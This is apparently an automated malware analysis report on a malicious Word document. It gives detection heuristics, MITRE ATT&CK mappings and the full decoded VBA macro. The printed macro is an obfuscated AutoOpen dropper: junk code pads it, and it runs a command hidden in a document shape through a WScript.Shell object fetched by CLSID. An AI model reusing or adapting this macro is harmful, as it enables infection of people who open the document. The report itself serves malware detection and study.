MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1218.011 System Binary Proxy Execution: Rundll32
T1059.003 Windows Command Shell
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros that utilize the dangerous `WScript.Shell` COM object to execute a command. This command, when deobfuscated, reveals a PowerShell execution that attempts to download and run a second-stage payload from a series of concatenated URLs. The AutoOpen macro and the use of `GetObject` further indicate malicious intent.
Heuristics 10
-
ClamAV: Doc.Malware.Powload-6827912-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Powload-6827912-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6016 bytes |
SHA-256: 0ed6b60cad437bf6943637c3a8daafd40264f30952169cf6a3a945ba617d67f3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
86 of 141 identifiers look randomly generated (e.g. 'jkjQbdJDi') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "TMrkPlA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case nKCHWu
Case 314225553
REIvv = Hex(zUhjZC)
zLERQX = Cos(223964602)
TRaUEzfE = 121763573
Case 261518072
NWLPpZiXX = Hex(DqCRzowwq)
XNSzm = Sqr(223708615 / CSng(181299475 - Cos(281463566 - 125198893) + POvdow + Rnd(258247617 - 319174944)))
rizKjP = Hex(YCFJhGc)
End Select
On Error Resume Next
Select Case zwoNG
Case 175550103
OjidKi = Hex(ajmBhFp)
uTjzrzwnw = Cos(34375498)
wLztpw = 271314414
Case 2477364
MFwnwdf = Hex(ninjPCD)
dGjNSsf = Sqr(157609371 / CSng(284911953 - Cos(210719433 - 79748993) + pzCsFLi + Rnd(270457525 - 148455809)))
BOTSAQRji = Hex(vYLrG)
End Select
On Error Resume Next
Select Case jzZDIfY
Case 195887290
AwWjQ = Hex(ZGvVbBjTo)
biaFh = Cos(193137214)
iGfKwiAFk = 58605975
Case 33648512
rWsDK = Hex(kziYZz)
ltjzzYbX = Sqr(325855887 / CSng(258592911 - Cos(169270936 - 245164906) + aXuQqtbP + Rnd(320535881 - 260502099)))
iPlwiQKh = Hex(iNpTHnkd)
End Select
On Error Resume Next
Select Case PiKkVEipj
Case 169513881
mltLbKS = Hex(VOXWEUIM)
EzAhX = Cos(157456631)
VifkDSN = 341237409
Case 288827828
ZBYpn = Hex(fLMir)
FPNsb = Sqr(240342036 / CSng(216209631 - Cos(164769068 - 325076552) + NOptfh + Rnd(238957300 - 18318955)))
XiwvH = Hex(NQvUVKpm)
End Select
Set PXLqdSS = Shapes("wwUiYjcaM")
On Error Resume Next
Select Case jVuRGc
Case 62975910
OhFPhXiJ = Hex(CzLPSSjn)
AzPhiER = Cos(62599017)
vVsSjNXwH = 206288411
Case 19593862
qrMhqCuDQ = Hex(LdfcL)
jwBwYi = Sqr(230745325 / CSng(259993889 - Cos(315343634 - 240069568) + wrVKEk + Rnd(208270630 - 62137329)))
DArBW = Hex(csKOn)
End Select
bJiwwc = "" + PJdEX + ZlGow + PXLqdSS.TextFrame.TextRange.Text + sHtzSFOj + bSCqdhzG
On Error Resume Next
Select Case SIPDRL
Case 3167370
crkhNzpf = Hex(YosbO)
NAojTi = Cos(67262469)
uqauE = 185140920
Case 247657338
DrdOSll = Hex(ANzSlK)
nEvCD = Sqr(187028664 / CSng(187816416 - Cos(218873350 - 15570860) + mprnEl + Rnd(25299906 - 104988147)))
lAzzu = Hex(OXjFkrT)
End Select
On Error Resume Next
Select Case ncqplKbzk
Case 47971642
uohiJWNpl = Hex(jzPUYPQ)
ClvTLF = Cos(335759634)
khvhCdW = 212062023
Case 259993361
cINfBqj = Hex(HdaUMu)
fiVCac = Sqr(188008983 / CSng(233023080 - Cos(222599312 - 251266400) + tDbCdjhB + Rnd(257995448 - 53173411)))
WkFjv = Hex(VAPUAVWvA)
End Select
On Error Resume Next
Select Case OYuCKE
Case 179509213
dfDrP = Hex(wKOZwJ)
PXsNbsaIA = Cos(112736752)
FSkEZV = 227034674
Case 233707858
pzMvubAt = Hex(vPDiOzBCp)
MAucOomz = Sqr(182348749 / CSng(289622094 - Cos(242573929 - 294252594) + MXKPLzSAs + Rnd(215963956 - 75948399)))
BKWDk = Hex(XfzXk)
End Select
On Error Resume Next
Select Case YVqZM
Case 64247105
AtWwwC = Hex(mjhJc)
aTrIWGwT = Cos(270714333)
Qhrch = 266697035
Case 176200267
szQzhSs = Hex(LoibCJsG)
EiiDFNw = Sqr(72590518 / CSng(246730006 - Cos(43646092 - 117618199) + ZVwFL + Rnd(110925152 - 192901146)))
amYQmv = Hex(kNFHo)
End Select
Set sTriKPpEu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + tzYjtW)
On Error Resume Next
Select Case LVKwXLD
Case 328464014
zYlSCUUD = Hex(XoobltXt)
zPJXN = Cos(170814519)
wSYZFCFFW = 314369590
Case 316532397
JGYwrzr = Hex(jkjQbdJDi)
ZLLTGBv = Sqr(200172338 / CSng(200427274 - Cos(136924903 - 232792512) + EpzzjvaR + Rnd(120748192 - 157310558)))
iSLiHwb = Hex(BXwVkMqAX)
End Select
Const RkXlasdp = 0
On Error Resume Next
Select Case njENW
Case 311023780
qVqRGRWMO = Hex(jcuEOXCL)
RwYcka = Cos(66799475)
vfOaTTFI = 216999679
Case 61465550
UVGrIzkOV = Hex(ZJCCCdzRs)
qwiaj = Sqr(151900 / CSng(94634990 - Cos(89436676 - 60511179) + vhNFqwKG + Rnd(107251246 - 206791666)))
LolWW = Hex(YQpFro)
End Select
On Error Resume Next
Select Case zaZEpYOS
Case 223804275
jtfWj = Hex(XiWCYjfia)
ZicjQu = Cos(41803654)
iuXTbl = 106620847
Case 219313503
WqsmVSpw = Hex(oCOOv)
dczfpBppm = Sqr(96221498 / CSng(261634855 - Cos(266057239 - 122579271) + Clmrz + Rnd(56286925 - 263473732)))
aEQnjOFD = Hex(Uzcpz)
End Select
On Error Resume Next
Select Case oUukq
Case 35752782
PjSva = Hex(XaGoBTZB)
zsCiO = Cos(202743273)
JWzKFUzSC = 12630467
Case 274492885
zYkCAjINi = Hex(fLwFlUCh)
qZQXvz = Sqr(105082529 / CSng(214283243 - Cos(23509120 - 179741470) + mzdZCdPp + Rnd(15470181 - 309503076)))
RPbqm = Hex(AiiQUp)
End Select
sTriKPpEu.Run# bJiwwc, RkXlasdp
On Error Resume Next
Select Case aPMLWNp
Case 182459235
bQpbAUtZm = Hex(wzlzutpwt)
bYzOaj = Cos(158523348)
lzWOQLY = 3831224
Case 143716721
wnDEU = Hex(kipSRS)
QwLWCRaA = Sqr(108130003 / CSng(318683607 - Cos(103459751 - 263237476) + ajiZYuXl + Rnd(4674533 - 39131188)))
XEoivu = Hex(LTPGS)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.